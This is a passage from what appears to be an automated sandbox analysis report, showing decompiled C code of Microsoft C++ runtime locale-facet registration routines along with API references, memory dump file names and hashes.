																																														_t731 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E1C66BA(_t770 - 0x14);
																																															return E6E1E0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E1D1558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t770 - 0x20);
																																																	E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t544, _t731, _t749, 0x14);
																																																	E6E1C6653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e286e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1A161C(0x6e286dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t770 - 0x14);
																																																		return E6E1E0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E1D15C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t770 - 0x20);
																																																				E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t544, _t732, _t750, 0x14);
																																																				E6E1C6653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e286dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1A161C(0x6e286d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t770 - 0x14);
																																																					return E6E1E0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E1D162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1A1438(_t663);
																																																							E6E1E3D74(_t770 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e22851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e22c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E1D542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E1E0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t733);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e286dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t732);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e286e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t731);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e286dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t730);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e286dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t729);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e286de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t728);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e286ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t727);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e286db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t726);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e286dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E1C6FD3(__eflags, _t725);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e286dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E1C6FD3(__eflags, _t724);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e286dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E1C6FD3(__eflags, _t723);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e286df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E1C6FD3(__eflags, _t722);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e286df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E1C6FD3(__eflags, _t721);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e286dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E1C6FD3(__eflags, _t720);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e286df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E1C6FD3(__eflags, _t719);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e286dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E1C6FD3(__eflags, _t718);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e286dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E1C6FD3(__eflags, _t717);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e286db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF230
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF23A
int.LIBCPMT ref: 6E1CF251

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1CF274
std::_Facet_Register.LIBCPMT ref: 6E1CF28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF2C9

Strings

lm(n, xrefs: 6E1CF245

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lm(n
API String ID: 438560357-3891014945
Opcode ID: 48af47f9130d42d184005a19c8d68f7c55f6f0e9ac99ff19438a4467299bca55
Instruction ID: 391dadce2ed7032be052bcde2310c524f0e6617f3b744c2aa1226123ef9c8aed
Opcode Fuzzy Hash: 48af47f9130d42d184005a19c8d68f7c55f6f0e9ac99ff19438a4467299bca55
Instruction Fuzzy Hash: 21115C7591051D8BCF01DBD4C854AFEB37AAF64B14F240508D530EB290DF78D989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t902 - 0x14, 0);
				_t861 =  *0x6e286db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1A161C(0x6e286d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E1C66BA(_t902 - 0x14);
					return E6E1E0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E1D0DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t902 - 0x20);
							E6E1E3D74(_t902 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t840, _t861, 0x14);
							E6E1C6653(_t902 - 0x14, 0);
							_t862 =  *0x6e286dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1A161C(0x6e286b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E1C66BA(_t902 - 0x14);
								return E6E1E0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E1D0E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t902 - 0x20);
										E6E1E3D74(_t902 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t637, _t841, _t862, 0x14);
										E6E1C6653(_t902 - 0x14, 0);
										_t863 =  *0x6e286de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1A161C(0x6e286d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E1C66BA(_t902 - 0x14);
											return E6E1E0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E1D0EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t902 - 0x20);
													E6E1E3D74(_t902 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t637, _t842, _t863, 0x14);
													E6E1C6653(_t902 - 0x14, 0);
													_t864 =  *0x6e286db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1A161C(0x6e286d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E1C66BA(_t902 - 0x14);
														return E6E1E0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E1D0F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t902 - 0x20);
																E6E1E3D74(_t902 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t637, _t843, _t864, 0x14);
																E6E1C6653(_t902 - 0x14, 0);
																_t865 =  *0x6e286dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1A161C(0x6e286d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E1C66BA(_t902 - 0x14);
																	return E6E1E0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E1D0F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t902 - 0x20);
																			E6E1E3D74(_t902 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t637, _t844, _t865, 0x14);
																			E6E1C6653(_t902 - 0x14, 0);
																			_t866 =  *0x6e286dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1A161C(0x6e286d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E1C66BA(_t902 - 0x14);
																				return E6E1E0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E1D0FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t902 - 0x20);
																						E6E1E3D74(_t902 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t637, _t845, _t866, 0x14);
																						E6E1C6653(_t902 - 0x14, 0);
																						_t867 =  *0x6e286df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1A161C(0x6e286d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E1C66BA(_t902 - 0x14);
																							return E6E1E0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E1D1057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t902 - 0x20);
																									E6E1E3D74(_t902 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t637, _t846, _t867, 0x14);
																									E6E1C6653(_t902 - 0x14, 0);
																									_t868 =  *0x6e286dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1A161C(0x6e286d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E1C66BA(_t902 - 0x14);
																										return E6E1E0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E1D10BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t902 - 0x20);
																												E6E1E3D74(_t902 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t637, _t847, _t868, 0x14);
																												E6E1C6653(_t902 - 0x14, 0);
																												_t869 =  *0x6e286df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1A161C(0x6e286da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E1C66BA(_t902 - 0x14);
																													return E6E1E0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E1D1127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t902 - 0x20);
																															E6E1E3D74(_t902 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t637, _t848, _t869, 0x14);
																															E6E1C6653(_t902 - 0x14, 0);
																															_t870 =  *0x6e286df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1A161C(0x6e286da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E1C66BA(_t902 - 0x14);
																																return E6E1E0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E1D11AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t902 - 0x20);
																																		E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t637, _t849, _t870, 0x14);
																																		E6E1C6653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e286dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1A161C(0x6e286d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6E1C66BA(_t902 - 0x14);
																																			return E6E1E0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6E1D1230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t902 - 0x20);
																																					E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t637, _t850, _t871, 0x14);
																																					E6E1C6653(_t902 - 0x14, 0);
																																					_t872 =  *0x6e286dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6E1A161C(0x6e286d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6E1C66BA(_t902 - 0x14);
																																						return E6E1E0075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6E1D12B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t902 - 0x20);
																																								E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t637, _t851, _t872, 0x14);
																																								E6E1C6653(_t902 - 0x14, 0);
																																								_t873 =  *0x6e286dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6E1A161C(0x6e286d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6E1C66BA(_t902 - 0x14);
																																									return E6E1E0075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6E1D1339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t902 - 0x20);
																																											E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t637, _t852, _t873, 0x14);
																																											E6E1C6653(_t902 - 0x14, 0);
																																											_t874 =  *0x6e286db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6E1A161C(0x6e286d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6E1C66BA(_t902 - 0x14);
																																												return E6E1E0075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6E1D13A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t902 - 0x20);
																																														E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t637, _t853, _t874, 0x14);
																																														E6E1C6653(_t902 - 0x14, 0);
																																														_t875 =  *0x6e286ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6E1A161C(0x6e286d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6E1C66BA(_t902 - 0x14);
																																															return E6E1E0075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6E1D1409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t902 - 0x20);
																																																	E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t637, _t854, _t875, 0x14);
																																																	E6E1C6653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6e286de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6E1A161C(0x6e286d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t902 - 0x14);
																																																		return E6E1E0075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6E1D1471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t902 - 0x20);
																																																				E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t637, _t855, _t876, 0x14);
